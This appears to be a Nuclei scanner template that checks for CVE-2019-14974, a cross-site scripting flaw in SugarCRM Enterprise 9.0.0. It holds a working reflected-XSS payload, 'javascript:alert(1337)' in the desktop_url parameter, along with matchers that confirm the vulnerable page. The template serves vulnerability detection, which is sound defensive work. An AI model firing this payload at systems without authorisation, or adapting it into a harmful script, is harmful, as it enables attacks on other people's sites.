30 lines
836 B
YAML
30 lines
836 B
YAML
id: CVE-2019-14974
|
|
|
|
info:
|
|
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
tags: cve,cve2019,xss,sugarcrm
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.10
|
|
cve-id: CVE-2019-14974
|
|
cwe-id: CWE-79
|
|
description: "SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS."
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/47247
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "url = window.location.search.split(\"?desktop_url=\")[1]"
|
|
part: body
|